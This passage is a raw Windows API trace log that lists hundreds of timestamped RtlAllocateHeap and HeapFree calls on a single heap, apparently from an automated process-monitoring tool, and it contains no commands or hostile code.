[0194.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0194.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 